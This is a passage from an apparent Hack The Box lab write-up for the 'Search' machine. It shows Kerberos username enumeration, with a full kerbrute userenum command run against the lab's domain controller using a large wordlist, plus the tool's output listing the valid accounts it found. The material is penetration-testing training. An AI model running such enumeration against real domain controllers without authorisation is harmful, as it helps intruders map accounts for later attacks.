Search_Kerberos

KDC

---

Nmap discovered a KDC on the target ports 88 and 464 The running service is Microsoft Windows Kerberos

While I do not know the naming convention that the target domain uses, I will attempt to enumerate usernames as much as possible by brute-forcing the KDC For efficiency, I will get that running in the background while enumerating other services

kerbrute

---

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ kerbrute userenum --dc research.search.htb -d SEARCH.HTB  /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t 200
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 01/30/24 - Ronnie Flathers @ropnop
 
2024/01/30 12:42:45 >  Using KDC(s):
2024/01/30 12:42:45 >  	research.search.htb:88
 
2024/01/30 12:42:46 >  [+] VALID USERNAME:	 administrator@SEARCH.HTB
2024/01/30 12:42:46 >  [+] VALID USERNAME:	 research@SEARCH.HTB
2024/01/30 12:42:47 >  [+] VALID USERNAME:	 Administrator@SEARCH.HTB
2024/01/30 12:45:04 >  [+] VALID USERNAME:	 RESEARCH@SEARCH.HTB
2024/01/30 13:14:10 >  [+] VALID USERNAME:	 Windows-12@SEARCH.HTB
2024/01/30 13:14:48 >  [+] VALID USERNAME:	 Research@SEARCH.HTB
2024/01/30 13:17:59 >  Done! Tested 8295455 usernames (6 valid) in 2113.375 seconds

I had kerbrute running in the background for a while and found 2 valid domain users;

• research: appears to be the machine account
• windows-12